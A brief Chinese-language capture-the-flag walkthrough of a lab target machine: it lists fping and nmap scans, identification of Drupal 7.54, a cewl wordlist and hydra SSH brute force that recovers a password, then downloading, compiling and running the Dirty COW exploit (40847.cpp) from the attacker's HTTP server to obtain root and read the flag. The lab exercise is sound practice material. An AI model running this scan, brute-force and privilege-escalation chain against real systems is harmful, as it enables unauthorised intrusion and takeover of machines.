靶机链接 https://pan.baidu.com/s/1Xp8kQzyX01z29zjpctBniQ?pwd=8888

找网段存活主机，确定靶机（先关靶机扫一遍，再开机扫一遍，差异的那个就是） fping -a -g -e 192.168.1.0/24

查看开放端口 nmap -sT --min-rate 10000 -p- 192.168.1.12

根据扫描结果针对性探测端口 sudo nmap -sT -sC -O -p22,53,80,1898 192.168.1.12

发现1898端口是Drupal

brup 探测目录， 确定cms版本 Drupal 7.54 http://192.168.1.12:1898/CHANGELOG.txt
获取用户名 tiago http://192.168.1.12:1898/audio.m4a 二维码 http://192.168.1.12:1898/qrc.png

开始google drupal的exp

生成字典准备爆破ssh cewl http://192.168.1.12:1898/?q=node/1 -w dict.txt

九头蛇爆破 hydra -l tiago -P dict.txt 192.168.1.12 ssh

爆破结果 [22][ssh] host: 192.168.1.12 login: tiago password: Virgulino

脏牛提权 searchsploit dirty cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/kali/learn/02

利用python建立http服务 python2 -m SimpleHTTPServer 8888

ssh连接 ssh tiago@192.168.1.12 下载提权代码 wget http://192.168.1.14:8888/40847.cpp

编译 g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

执行 ./40847

获取root权限 Running ... Received su prompt (Password: ) Root password is: dirtyCowFun Enjoy! :-)

cd /root cat flag.txt 9740616875908d91ddcdaa8aea3af366

其实还有别的思路后续再完善